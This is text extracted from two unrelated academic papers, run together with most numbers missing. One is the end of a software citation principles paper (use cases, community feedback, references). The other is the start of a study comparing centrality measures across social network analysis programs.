benchmarks someone else’s software with or without modification on one or many hardware platforms for publication this case describes the need for a researcher who has contributed to software (by design, software engineering, development, testing, patching, documentation, training, evangelizing, etc.) to have their software work recognized by their employer or colleagues for the purpose of career advancement and increased professional reputation. smith et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ requirements for researcher: � name of software � names of software authors/contributors � software version number and release date � location/repository � citable doi of software or paper recommended for citation � format for citing software in source code or citation metadata file possible steps: . software developers create citation file and associate with source code release/repository. . researcher finds and uses software in the development of new software. . researcher identifies citation metadata file (e.g., citation file) associated with downloaded/installed software source code or in online repository/published location. citation file includes necessary citation metadata. citation file may include bibtex entry, suggested citation format. . researcher cites software in source code, documentation, or other metadata-containing file. after review of this use case, we decided that based on the title this falls under use case , where a researcher uses someone else’s software for a paper. unlike use case , which is general in terms of the use of software, here the use leads to a benchmarking study—but the outcome in both cases is a paper that needs to cite the software. researcher who wants to publish about a piece of software the research wants to publish about a version of software they have produced. a key part of this use case is to be able to connect the given narrative to a specific version of the software in questions and connect that in large story. requirements: � name of software � names of software authors/contributors � location/repository � citable doi of software � links to older versions of software this is similar to use case , other than the fact that the software developer(s) and paper author(s) will likely be the same person/people here. researcher wants to record the software that generated some data this is the case where a researcher is using some software to perform an analysis, either of a physical sample or of data. the researcher needs to know which version was used, for smith et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ example in case a bug was fixed. note that knowing the software and its version is not sufficient to determine the “conditions” of the analysis, but they are essential. requirement: the analysis, or the generated data, has information about the software used. this is also similar to use case , except in that case the research output is a paper, while here the output is a dataset. researcher who wants to reproduce experience of use of a particular software implementation in context researcher is engaged in historical/cultural research, e.g., a study of video games as cultural artifacts. requirements: � name of software � software version number � documentation of the execution environment/context � location/repository for virtual machine (or equivalent) comprising both software and execution environment/context � persistent identifier associated with virtual machine instance (or equivalent) comprising both software and execution environment/context possible steps: . researcher obtains persistent id from citation . research uses a persistent id resolution service to resolve id to a location of an executable vm instance in a repository . researcher obtains vm in the repository, executes it, and interacts with software this overlaps use case (reproducing analysis), and so we decided not to include this as a distinct use case. appendix c feedback following force this appendix contains a record of comments made by the force community on the draft software citation principles, either directly via hypothesis on the draft document (https://www.force .org/softwarecitation-principles) posted following the force conference (https://www.force .org/meetings/force ) or via github issues (https://github.com/force /force -scwg/issues), and the responses to these comments. on unique identification i know this suggestion of a single unique identifier comes from the doi perspective where it works pretty well, but i’m wondering if something different in the way of identification should be used for software. for creative works generally there is the frbr model smith et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://www.force .org/softwarecitation-principles https://www.force .org/meetings/force https://github.com/force /force -scwg/issues http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (https://en.wikipedia.org/wiki/functional_requirements_for_bibliographic_records) which defines several levels for a creative entity—“work,” “expression,” “manifestation,” and “item.” i think something along these lines are particularly relevant for software—it is useful to be able to locate all uses of a particular piece of software no matter what version (the “work” level—software identified by a particular name and purpose over a period of time), but it is also important to specify the particular version used in any given work (“expression”—the source code at the time of use) and in some cases also the platform (“manifestation”—the compiled bytes including libraries, for example a docker image). “item” probably isn’t relevant for software. that is, i think a software citation perhaps could use three distinct unique identifiers, one for the work itself, one for the specific version (source code), and possibly an additional one for the actual downloadable binary image that can be run. rather than leave it implicit i think recognizing the different levels of citable record would be helpful here. #f sc reply: i interpret the requirement for “global uniqueness” as referring to the identifier itself. two different people can have the same name (not globally unique) but cannot share a single orcid (globally unique). global uniqueness of the identifier does not preclude multiple identifiers pointing to the same person. i think the suggestion of differentiating between different software expressions/manifestations/items is a reasonable one, but i don’t think it relaxes the requirement for identifiers to be globally unique. our response: we agree that there are valid points here, but on balance we don’t feel that the rewards from implementing this outweigh the practical challenges. on accessibility should this document address this in further detail? for example, “permit and facilitate access” could be explored further. should this be done through open access licensing? repositories? who’s responsible for providing this access? i am also wondering if this is a separate issue since “citing” traditionally pointed to publications but did not necessarily address access. doi, for example is stated, but doesn’t guarantee “access,” so does this simply restating point , or should it provide something new? our response: we agree that accessibility should receive further attention, which the follow-on group focusing on implementation will provide. however, this is out of scope for the document outlining the principles. to the second point, accessibility provides information about access, but does not guarantee access itself (e.g., paywalled article). on specificity i am wondering if this should be folded into number “unique identification.” both seem to deal with the issue of identification and access. our response: a unique software identifier can point to the specific version/variant of software, but it can also identify other things (collection of versions, repository, etc.), smith et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://en.wikipedia.org/wiki/functional_requirements_for_bibliographic_records http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ while this principle deals with the need to identify the specific version of software used (via citation). on academic credit a lot of software that were developed by non-academic engineers also contribute to academic research indirectly. their names and contributions should also be credited. so removing “academic” makes more sense? reply: this is a good point, though i think academic and non-academic credit are different, so perhaps we can add to this regarding non-academic credit, rather than removing “academic.” reply: i agree with daniel on this. keep academic and add non-academic. our response: we’ve made the bullet more general, just about credit, discussing academic credit and adding a sentence about non-academic credit as well. on citations in text although the focus here is on citations in the references, as a publisher, our experience is that most common practice of “citation” of data and software for authors is typically in the main body of the text. in order to encourage software to be treated and valued as a first-class research object, it is important that citations to it be positioned in the references as citations to articles and books are. however, it would be a missed opportunity if we did not leverage current practices of authors. this will also likely arise during implementation, as it has for the data citation implementation publisher early adopters pilot. this could be addressed in future work on implementation. our response: in the principles, we propose that software should be cited in the references list, to recognize the primary role of software in research. however, this practice is not mutually exclusive with also referencing/citing software in the main body of a paper—as long as the software is cited in the references. on unique identification clearer instructions will be needed for authors on which version to cite. for biomed central journals, we ask authors to cite two versions of the software, an archived version (e.g., on zenodo) as well as the current version (e.g., on github). this is to ensure accessibility. however, if repositories and archives were to include a persistent link to the current version of the software, publishers could then instruct authors to cite only software with a uid, which wouldn’t point to a current version, but would point to the version(s) used and would be a more accurate version of scientific record. related to this point is the idea of group object identifiers. a need for group identifiers has been identified in the area of data (e.g., in the case of meta-analyses), and one could also identify a use case for these in the case of software, collecting metadata around all versions of a given software package. see blog here (https://blog. datacite.org/to-better-understand-research-communication-we-need-a-groid-group- object-identifier/). smith et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://blog.datacite.org/to-better-understand-research-communication-we-need-a-groid-group-object-identifier/ https://blog.datacite.org/to-better-understand-research-communication-we-need-a-groid-group-object-identifier/ https://blog.datacite.org/to-better-understand-research-communication-we-need-a-groid-group-object-identifier/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ our response: we recommend citing the specific version of the software that was used. we expect that the unique identifier (e.g., doi) will point to a landing page that directs to the repository/current version. however, this is more of a convenience issue that the software developers should address, rather than the author citing the software they used. on future work for implementation we would recommend both consulting with adopters as well as developing metadata standards simultaneously rather than developing metadata standards and then pursuing early adopters implementation. the work early adopters are doing now for data citation will be able to be leveraged for software citation and the changes needed to do so could happen now. there is no need to wait on approval of new tagging for a specific metadata standard. many publishers will have their own preferred metadata standards and so implementation could begin now with publishers, as long as we know what we want to capture. future implementation groups might also consider levels of contribution. this is particularly relevant for software. who is considered an author? for example, to what extent should authors of pull requests receive attribution? this might be considered in an faqs group, or possibly an early adopters group. our response: we agree that metadata standards should be developed with the input of adopters, and have updated this text accordingly. additional thoughts (not sure what section this applies to) the principles do not address virtual machines. as these are becoming more common and relevant when addressing the reproducibility of research, it is important this “form” of software is acknowledged. the question remains in which cases should authors cite the current version, which the static archived version, and in which the virtual machine? in this way software is very much a unique evolving research object and might not fit perfectly into the same citation practices and structure as other research objects. in addition, software citation could possibly occur within the virtual machine. this could be added as a use case. our response: we feel this has been addressed in section . , with the explicit addition of virtual machines in addition to executables and containers. this is also an issue that should be addressed further by the follow-on implementation working group. on persistence of identifier vs. persistence of software the persistence principle outlined in ( ) is a key element in making software citeable. where software has become part of the record of science not only the identifier and metadata of the software should be persistent, it should also be the goal to keep a persistent copy of the source code, where applicable. this links with the accessibility principle ( ). there are still many open questions about how to resolve package dependencies in the long term, therefore i would not make the persistent access to code a hard smith et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ requirement but may add something more specific towards preserving the record of science. our response: our goal is for software citations to point to (persistent) archived source code, but we are not—nor could we—require this. granularity of the citation one of the key issues with any citation, whether document, individual, or software is the specificity of what is being cited. in the case of publications, there is almost zero specificity most of the time. it’s very easy to cite an entire package even though one function was used. part of this problem is being solved in the python world through this project (https://github.com/duecredit/duecredit). any citation should have the ability to specify more than just the obvious, but even the obvious would be a good starting point. the citation/url should therefore allow for greater specificity within a code base. in general though, a provenance record of the workflow would be significantly more useful than a citation from a research perspective. our response: we agree that greater specificity is desirable in some cases, but we do not believe this rises to the level of what should be specified or discussed in the principles at this time. “software citations should permit : : : access to the software itself” under the “access” header, the data declaration states that: data citations should facilitate access to the data themselves. under the same header, the software declaration states: software citations should permit and facilitate access to the software itself. the addition of “permit” suggests that software citations should also grant the user with permission to access the software. is this intentional? it doesn’t seem like a good idea to make access a requirement for discovery, so “permit” might not be helpful in this sentence. our response: to avoid confusion, we removed “permit and” from the accessibility principle. access to software: free vs commercial the section talks about software that is “free” as well as “commercial” software. i am not sure whether this is about free as in freedom (or just gratis or freely available), since it is compared with commercial software, which is unrelated in general, see http://www.gnu. org/philosophy/words-to-avoid.html#commercial. i suppose that “free” should be replaced by “gratis” and “commercial” be replaced by “non-free” in that section. our response: we think this is sufficiently clear as written. smith et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/duecredit/duecredit http://www.gnu.org/philosophy/words-to-avoid.html#commercial http://www.gnu.org/philosophy/words-to-avoid.html#commercial http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ acknowledgements while d. s. katz prepared this material while employed at the nsf, any opinion, finding, and conclusions or recommendations expressed in this material are those of the authors and do not necessarily reflect the views of the nsf. additional information and declarations funding work by d. s. katz was supported by the national science foundation (nsf) while working at the foundation. work by k. e. niemeyer was supported in part by the nsf under grant aci- . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: nsf: aci- . competing interests arfon m. smith is an employee of github, inc., san francisco, california. author contributions � arfon m. smith wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. � daniel s. katz wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. � kyle e. niemeyer wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. data deposition the following information was supplied regarding data availability: the research in this article did not generate, collect or analyse any raw data or code. references aas editorial board. . policy statement on software. available at http://journals.aas.org/ policy/software.html (accessed february ). ahalt s, carsey t, couch a, hooper r, ibanez l, idaszak r, jones mb, lin j, robinson e. . nsf workshop on supporting scientific discovery through norms and practices for software and data citation and attribution. technical report. arlington: national science foundation. available at http://dl.acm.org/citation.cfm?id= . allen a, berriman gb, duprie k, mink j, nemiroff r, robitaille t, shamir l, shortridge k, taylor m, teuben p, wallin j. . improving software citation and credit. technical report. available at http://arxiv.org/abs/ . [cs.dl]. barnes n, jones d, norvig p, neylon c, pollock r, jackson j, stodden v, suber p. . science code manifesto. available at http://sciencecodemanifesto.org (accessed april ). smith et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://journals.aas.org/policy/software.html http://journals.aas.org/policy/software.html http://dl.acm.org/citation.cfm?id= http://arxiv.org/abs/ . http://sciencecodemanifesto.org http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ bechhofer s, buchan i, roure dd, missier p, ainsworth j, bhagat j, couch p, cruickshank d, delderfield m, dunlop i, gamble m, michaelides d, owen s, newman d, sufi s, goble c. . why linked data is not enough for scientists. future generation computer systems ( ): – doi . /j.future. . . . chue hong n. . publish or be damned? an alternative impact manifesto for research software. available at http://www.software.ac.uk/blog/ - - -publish-or-be-damned-alternative- impact-manifesto-research-software (accessed february ). credit. . consortia advancing standards in research administration information. available at http://casrai.org/credit (accessed february ). data citation synthesis group. . joint declaration of data citation principles. martone m. (ed.). final document. san diego: force . available at https://www.force .org/group/joint- declaration-data-citation-principles-final. fox p, signell r. . nsf geo-data informatics: exploring the life cycle, citation and integration of geo-data workshop report. final document. troy: rensselaer polytechnic institute. available at http://tw.rpi.edu/web/workshop/community/geodata . gent i, jones c, matthews b. . guidelines for persistently identifying software using datacite. a jisc research data spring project. available at http://rrr.cs.st-andrews. ac.uk/wp-content/uploads/ / /guidelines-software-identification.pdf (accessed april ). gil y, ratnakar v, garijo d. . ontosoft: capturing scientific software metadata. in: proceedings of the eighth acm international conference on knowledge capture (k-cap). new york: acm. github. . making your code citable with github & zenodo. available at https://guides.github. com/activities/citable-code/ (accessed march ). gutzman k, konkiel s, white m, brush m, ilik v, conlon m, haendel m, holmes k. . attribution of work in the scholarly ecosystem. figshare doi . /m .figshare. .v . hannay je, langtangen hp, macleod c, pfahl d, singer j, wilson g. . how do scientists develop and use scientific software? in: proceedings icse workshop on software engineering for computational science and engineering, secse. piscataway: ieee, – doi . /secse. . . howison j, bullard j. . software in the scientific literature: problems with seeing, finding, and using software mentioned in the biology literature. journal of the association for information science and technology ( ): – doi . /asi. . huang y-h, rose pw, hsu c-n. . citing a data repository: a case study of the protein data bank. plos one ( ):e doi . /journal.pone. . ison j, kalaš m, jonassen i, bolser d, uludag m, mcwilliam h, malone j, lopez r, pettifer s, rice p. . edam: an ontology of bioinformatics operations, types of data and identifiers, topics and formats. bioinformatics ( ): – doi . /bioinformatics/btt . jackson m. . how to cite and describe software. available at http://www.software.ac.uk/how- cite-and-describe-software (accessed february ). jackson m. . oh research software, how shalt i cite thee? available at http://www.software.ac. uk/blog/ - - -oh-research-software-how-shalt-i-cite-thee (accessed february ). jackson i, schwarz c. . debian policy manual. version . . . . available at https://www. debian.org/doc/debian-policy/ch-controlfields.html (accessed april ). smith et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.future. . . http://www.software.ac.uk/blog/ - - -publish-or-be-damned-alternative-impact-manifesto-research-software http://www.software.ac.uk/blog/ - - -publish-or-be-damned-alternative-impact-manifesto-research-software http://casrai.org/credit https://www.force .org/group/joint-declaration-data-citation-principles-final https://www.force .org/group/joint-declaration-data-citation-principles-final http://tw.rpi.edu/web/workshop/community/geodata http://rrr.cs.st-andrews.ac.uk/wp-content/uploads/ / /guidelines-software-identification.pdf http://rrr.cs.st-andrews.ac.uk/wp-content/uploads/ / /guidelines-software-identification.pdf https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ http://dx.doi.org/ . /m .figshare. .v http://dx.doi.org/ . /secse. . http://dx.doi.org/ . /asi. http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /bioinformatics/btt http://www.software.ac.uk/how-cite-and-describe-software http://www.software.ac.uk/how-cite-and-describe-software http://www.software.ac.uk/blog/ - - -oh-research-software-how-shalt-i-cite-thee http://www.software.ac.uk/blog/ - - -oh-research-software-how-shalt-i-cite-thee https://www.debian.org/doc/debian-policy/ch-controlfields.html https://www.debian.org/doc/debian-policy/ch-controlfields.html http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ jones mb, smith am, cabunoc mayes a, boettiger c. . minimal metadata schemas for science software and code, in json and xml. available at https://github.com/codemeta/ codemeta (accessed march ). katz ds. . transitive credit as a means to address social and technological concerns stemming from citation and attribution of digital products. journal of open research software ( ):e doi . /jors.be. katz ds, choi s-ct, lapp h, maheshwari k, löffler f, turk m, hanwell m, wilkins-diehr n, hetherington j, howison j, swenson s, allen g, elster a, berriman b, venters c. . summary of the first workshop on sustainable software for science: practice and experiences (wssspe ). journal of open research software ( ):e doi . /jors.an. katz ds, choi s-ct, wilkins-diehr n, chue hong n, venters cc, howison j, seinstra fj, jones m, cranston k, clune tl, de val-borro m, littauer r. a. report on the second workshop on sustainable software for science: practice and experiences (wssspe ). journal of open research software ( ):e doi . /jors. . katz ds, choi s‐ct, niemeyer ke, hetherington j, löffler f, gunter d, idaszak r, brandt sr, miller ma, gesing s, jones nd, weber n, marru s, allen g, penzenstadler b, venters cc, davis e, hwang l, todorov i, patra a, de val-borro m. b. report on the third workshop on sustainable software for science: practice and experiences (wssspe ). technical report. available at http://arxiv.org/abs/arxiv: . [cs.se]. katz ds, smith am. . implementing transitive credit with json-ld. journal of open research software :e doi . /jors.by. knepley mg, brown j, mcinnes lc, smith bf. . accurately citing software and algorithms used in publications. figshare doi . /m .figshare. .v . lipson c. . cite right, second edition: a quick guide to citation styles–mla, apa, chicago, the sciences, professions, and more, chicago guides to writing, editing, and publishing. chicago: university of chicago press. malone j, brown a, lister al, ison j, hull d, parkinson h, stevens r. . the software ontology (swo): a resource for reproducibility in biomedical data analysis, curation and digital preservation. journal of biomedical semantics ( ): – doi . / - - - . mayernik m, maull k, hart d. . tracing the use of research resources using persistent citable identifiers. poster presented at nsf si pi meeting, arlington, va. available at https://share.renci. org/si pi / _si pi_posters/mayernik_si poster_feb .pdf (accessed march ). mcadoo t. . how to cite software in apa style. available at http://blog.apastyle.org/apastyle/ / /how-to-cite-software-in-apa-style.html. morin a, urban j, adams pd, foster i, sali a, baker d, sliz p. . shining light into black boxes. science ( ): – doi . /science. . norén l. . invitation to comment on a proposal for a cohesive research software citation- enabling platform. available at http://astronomy-software-index.github.io/ -workshop/ (accessed february ). parsons ma, duerr r, minster j-b. . data citation and peer review. eos, transactions american geophysical union ( ): – doi . / eo . rowe br, wood dw, link an, simoni da. . economic impact assessment of nist’s text retrieval conference (trec) program. final report. research triangle park: rti international. available at http://trec.nist.gov/pubs/ .economic.impact.pdf (accessed april ). software attribution for geoscience applications (saga). . software for science: getting credit for code. available at https://geodynamics.org/cig/projects/saga/ (accessed april ). smith et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/codemeta/codemeta https://github.com/codemeta/codemeta http://dx.doi.org/ . /jors.be http://dx.doi.org/ . /jors.an http://dx.doi.org/ . /jors. http://arxiv.org/abs/arxiv: . http://dx.doi.org/ . /jors.by http://dx.doi.org/ . /m .figshare. .v http://dx.doi.org/ . / - - - https://share.renci.org/si pi / _si pi_posters/mayernik_si poster_feb .pdf https://share.renci.org/si pi / _si pi_posters/mayernik_si poster_feb .pdf http://blog.apastyle.org/apastyle/ / /how-to-cite-software-in-apa-style.html http://blog.apastyle.org/apastyle/ / /how-to-cite-software-in-apa-style.html http://dx.doi.org/ . /science. http://astronomy-software-index.github.io/ -workshop/ http://dx.doi.org/ . / eo http://trec.nist.gov/pubs/ .economic.impact.pdf https://geodynamics.org/cig/projects/saga/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ sandve gk, nekrutenko a, taylor j, hovig e. . ten simple rules for reproducible computational research. plos computational biology ( ):e doi . /journal.pcbi. . soergel daw. . rampant software errors may undermine scientific results [version ; referees: approved]. f research : doi . /f research. . . software credit workshop. . software credit workshop. available at http://www.software.ac. uk/software-credit (accessed april ). starr j, castro e, crosas m, dumontier m, downs rr, duerr r, haak l, haendel m, herman i, hodson s, hourclé j, kratz je, lin j, nielsen lh, nurnberger a, proell s, rauber a, sacchi s, smith a, taylor m, clark t. . achieving human and machine accessibility of cited data in scholarly publications. peerj computer science :e doi . /peerj-cs. . sufi s, chue hong np, hettrick s, antonioletti m, crouch s, hay a, inupakutika d, jackson m, pawlik a, peru g, robinson j, carr l, de roure d, goble c, parsons m. . software in reproducible research: advice and best practice collected from experiences at the collaborations workshop. in: proceedings st acm sigplan workshop on reproducible research methodologies and new publication models in computer engineering (trust ’ ). edinburgh: acm, : – : doi . / . . van de sompel h, payette s, erickson j, lagoze c, warner s. . rethinking scholarly communication: building the system that scholars deserve. d-lib magazine : . available at http//www.dlib.org/dlib/september /vandesompel/ vandesompel.html. ward g, baxter a. . distributing python modules. available at https://docs.python.org/ . / distutils/setupscript.html#additional-meta-data (accessed august ). white o, dhar a, bonazzi v, couch j, wellington c. . nih software discovery index meeting report. nih. available at http://www.softwarediscoveryindex.org/ & https://gist.github. com/mhucka/ ea e a dbd d b b . wickham h. . r packages. first edition. sebastopol: o’reilly media. wilson g, aruliah da, brown ct, chue hong np, davis m, guy rt, haddock shd, huff kd, mitchell im, plumbley md, waugh b, white ep, wilson p. . best practices for scientific computing. plos biology ( ):e doi . /journal.pbio. . wilson r. . encouraging citation of software–introducing citation files. available at http://www.software.ac.uk/blog/ - - -encouraging-citation-software-introducing-citation- files (accessed february ). smith et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . /f research. . http://www.software.ac.uk/software-credit http://www.software.ac.uk/software-credit http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . / . http://www.dlib.org/dlib/september /vandesompel/ vandesompel.html https://docs.python.org/ . /distutils/setupscript.html#additional-meta-data https://docs.python.org/ . /distutils/setupscript.html#additional-meta-data http://www.softwarediscoveryindex.org/ https://gist.github.com/mhucka/ ea e a dbd d b b https://gist.github.com/mhucka/ ea e a dbd d b b http://dx.doi.org/ . /journal.pbio. http://www.software.ac.uk/blog/ - - -encouraging-citation-software-introducing-citation-files http://www.software.ac.uk/blog/ - - -encouraging-citation-software-introducing-citation-files http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ software citation principles software citation principles motivation process of creating principles use cases related work discussion future work appendix a appendix b appendix c acknowledgements references microsoft word - volume _final insna.org | issues & | volume | are we in agreement? benchmarking and reliability issues between social network analytic programs philip j. murphy middlebury institute of international studies monterey, ca, usa yufei wang middlebury institute of international studies monterey, ca, usa karen t. cuenco university of pittsburgh pittsburgh, pa, usa abstract reliability and validity are key concerns for any researcher. we investigate these concerns as they apply to social network analysis programs. six well-used and trusted programs were compared on four common centrality measures (degree, betweenness, closeness, and eigen- vector) under a variety of network topographies. we identify notable inconsistencies between programs that may not be apparent to the average user of these programs. specifically, each program may have implemented a variant of a given measure without informing the user of its characteristics. this presents an unnecessary obfuscation for analysts seeking measures that are best suited to the idiosyncrasies of their data, and for those comparing results between programs. under such a paradigm, the terms in use within the social network analysis community become less precise over time and diverge from the original strength of network analysis: clarity. acknowledgements the authors would like to thank elma paulauskaite and maizy cuenco for their help in putting together this research. this work was funded in part through a grant from the national institutes of health: grant number nidcr r de . authors philip j. murphy, middlebury institute of international studies, monterey, ca, usa. yufei wang, middlebury institute of international studies, monterey, ca, usa. karen t.cuenco, department of human genetics, university of pittsburgh, pa, usa. correspondence concerning this work should be addressed to philip j. murphy, middlebury institute of international studies, pierce st., monterey ca usa, pjmurphy@miis.edu; phone: - - ; fax: - - connections benchmarking and reliability issues | volume | issues & | insna.org introduction an important part of the appeal of social network analysis originates from the in- corporation of mathematical descriptions for social relations. this has made it possi- ble to provide clear and unambiguous defi- nitions for concepts relating to relational structures. the clarity of communication that resulted from this intersection of mathematics and social sciences has been credited with much of the field’s early growth (freeman ). as freeman re- lates, [from] the start, contributions to social network analysis were often couched in mathematical terms. the rela- tive precision of these mathematical treat- ments gave social networks an advantage. because of that precision, the network field did not generate the same kinds of quibbles and misunderstandings over terms and concepts that lead to conflict in fields that are wedded to a natural language. ( ) the mathematical core of social network analysis has delivered the dual benefits of precision and flexibility. equa- tions are clear to the point that those who were interested in the topic could build up- on one another’s work with minimal need for clarification. but mathematical defini- tions are also general enough to allow for their application in a variety of relational contexts. the structural measures that form the core of social network analysis have thereby proven to be compelling in a varie- ty of contexts and interests. the logarith- mic proliferation in where and how social network analysis has been applied (otte and rousseau , freeman ) is tes- tament to the scalability of the field. the diverse purposing of social network analysis has been mirrored by a corresponding proliferation in the number and variety of software packages that are available today in the field of social net- work analysis. although software develop- ers and programmers have put a great deal of effort into producing network analytic software that is suited to a wide variety of needs and applications, no single piece of software is generally applicable to every situation. software packages have been op- timized for efficiency, analytic variety, an- alytic specificity, ease of use, specialized data handling, greater capacity for visuali- zation, and for terminology and concepts that are tailored to a particular end-user. software also differs in style of user inter- face, method of reporting, and even the de- fault methods for scaling output. as the available packages continue to diversify, their content is also converg- ing. however, the question of whether the analytic functions across programs are tru- ly equivalent and exchangeable arises. are the names being used to identify each function explicit in what they identify, or are they only referring to a generalized class of functions? naming conventions are important. the developers of network analytic soft- ware are faced with decisions about how they should implement a particular analytic function. some software developers may choose to incorporate the ability to handle common topological features of social networks (e.g., loops, multiple compo- nents) by default, while others may choose a stricter interpretation of how the measure or algorithm should perform. under such a paradigm, the terms in use within the so- cial network analysis community become less precise over time and diverge from the original strength of network analysis: clari- ty. it is possible that a measure or algo- rithm differs by implementation in order to address some given scenario or feature of network topology, and that it therefore bears unique attributes that constitute a trade-off at some level. it is therefore valu- able to both analysts and the social net- work analysis community for any such dif- ferences to be explicit, or systematized. the issue of whether two software implementations produce the same measures is especially important when us- ing two programs in concert. in such situa- tions, consistency of output indicates that the user is introducing a minimum of vari- ability when moving from one program to benchmarking and reliability issues connections insna.org | issues & | volume | another. the equivalency of network met- rics is important as small variations in such basic measures may translate into large dif- ferences on more complex algorithms. however, procedural dissimilarities in programs’ calculations of measures can be difficult to identify and frequently lack documentation. differences in how various soft- ware programs provide output constitute a barrier to assessing consistency of measures from program to program. the variety in default output styles (e.g., raw scores, normalized scores, scalar multi- plied output) makes it difficult to visually compare raw output. even if there were to be no meaningful difference in the infor- mation provided in the output, the empiri- cal differences that are evident on casual inspection make such a judgment more dif- ficult to establish. the numbers may look different, but in many cases the user would never know just by visual inspection. table : analytic interfaces used in this study our primary focus is an assessment of inter-program reliability and three relat- ed questions. are the various software pack- ages producing consistently equiva- lent results? if not, how do they differ? under what conditions do the centrality outputs diverge, if divergences exist? to assess inter-program reliability, we focused on the basic building block of network analysis: node centrality. specifi- cally, the investigation involved the four most commonly applied centrality measures: degree, betweenness, closeness, and eigenvector (valente et al. ). such measures are often fundamental to social network analysis. here, we evaluate and report on the consistency of basic measures of node centrality from across various software platforms in standardized simula- tions. materials and methods six software packages for social network analysis were compared in terms of their calculations of four basic measures of node centrality in each of four networks. we se- lected popular network analytic software that are self-contained (ucinet, pajek, ora, and gephi), or available through cran r archive (sna and igraph) packag- es (table , below). measures the “big four” centrality measures (degree, betweenness, closeness, and eigenvector centrality) were calculated using each ana- the program pajek does not include a measure titled eigenvector centrality. in cases of undirected networks, pajek’s “hubs and authorities” measure is analogous to eigenvector centrality and was used for the purpose of comparison. version source ucinet . http://www.analytictech.com/ pajek . http://pajek.imfm.si/ ora-netscenes . . . . http://www.casos.cs.cmu.edu/projects/ora/ gephi . . http://gephi.org/ sna . - http://www.statnet.org/ igraph . . http://igraph.org/ connections benchmarking and reliability issues | volume | issues & | insna.org lytic interface. these measures were se- lected because they are basic measures that are frequently used alone for analytic in- ference, as well as functioning as constitu- ent parts of more complex algorithms. var- iability in these measures may lead to downstream variation in analytic results for more complex algorithms. some pro- grams produce output in multiple formats (e.g., raw, normalized, scaled). when pos- sible, similarly scaled output was com- pared (table , below). table : output scaling centrality measures were deemed to be optimally correspondent if the pear- son correlation coefficient comparing two centrality values was . . the closer the correlation is to the optimally con- sistent value and when scatterplots lie along a ° line, the better the centrality values concur between software calcula- tions. optimal consistency is invariant to scale and magnitude differences in raw centrality values. if the correlation fell be- low . , then there was suggestive evi- dence that these measures lacked consen- sus across software. scatterplots offer additional insight for comparing similar measures that em- ploy different scales. if any nodes are of particular interest to the analyst then poten- tial variations in their measurement may become very important. deviations in the measurement of a small number of nodes within a large network could still occur within the correlation threshold that we se- lected. scatterplots were therefore used to identify or characterize variation in meas- urement and assess whether such variation, if present, is a singular anomaly (e.g., dif- ferences in floating point) or appear to be deviations that are patterned (i.e., errors that arise from differences in the assump- tions behind how a measure should be cal- culated). datasets network data (graphs) of variable size and modality were generated to compare cen- trality measures across software packages. undirected one-mode [small (n= ) and a moderately large (n= )] and two-mode [small (n = , n = ) and a moderately large (n = , n = )] network datasets were generated. initially, both the one- mode, and two-mode networks contained smaller disconnected components (e.g., isolates and/or other small components) in addition to a large main component (table ). one-mode networks also contained loops. new networks were created by re- moving loops, removing smaller compo- nents, or both, from the initial network in order to model a variety of conditions. this resulted in twelve networks: both large and small networks that contain either loops, or disconnected components, or both, or nei- ther; as appropriate for one- or two-mode networks. each dataset was designed to be well within the data handling limits of each of the software packages that we evaluat- ed. most of the programs tested were lim- ited mainly by concerns such as network density and size, in addition to the proces- sor speed and the amount of available memory in a given computer. all are degree closeness betweenness eigenvector gephi raw normalized av- erage raw scaled (max= ) pajek raw normalized normalized normalized ucinet raw average raw normalized ora normalized normalized normalized normalized sna raw normalized raw normalized igraph raw normalized raw scaled (max= ) benchmarking and reliability issues connections insna.org | issues & | volume | table : data used for reliability comparisons capable of handling networks into the tens of thousands of nodes, with some capable of handling networks into the millions of nodes. centrality measures were calculat- ed using all six programs under a variety of conditions on all four networks, where ap- plicable. all graphs were undirected, with no multiple edges. these graphs were analyzed under multiple conditions: ) loops (edges that recursively link a node to itself), but no disconnected components present; ) disconnected components, but no loops present; ) loops and disconnect- ed components present; and ) a reference graph with no loops or disconnected com- ponents. for a more detailed description of the procedures used for each software pro- gram, see appendix . results our findings, presented in brief form in table , demonstrate that differences be- tween analytic programs exist on each measure, with the notable exception of betweenness centrality. results are pre- sented below by measure, and within each measure, by network condition. results are presented in a manner that highlights some of the most common or notable differences between programs. consistency was considered to be “high” when no notable loops were not considered to be a feature that is consistent with the definition of two-mode networks as consisting of two sets of nodes that have ties between but not within each node set. the two-mode networks were therefore not evaluated for network data with loops. difference arose, “medium” when the out- put from one or two software implementa- tions differed from others, and “low” when the output from more than two software implementations differed from others. for the sake of brevity, many of the cases where all programs demonstrated high consistency in the measures produced (“high” in table ) are not discussed but may be noted in the table below. for all measures, with the exception of eigenvec- tor, differences in output were generally more pronounced in smaller networks. data nodes in main component nodes in smaller components number of loops max. number of nodes average degree small one-mode . large one-mode . small two-mode ( , ) na ( , ) . large 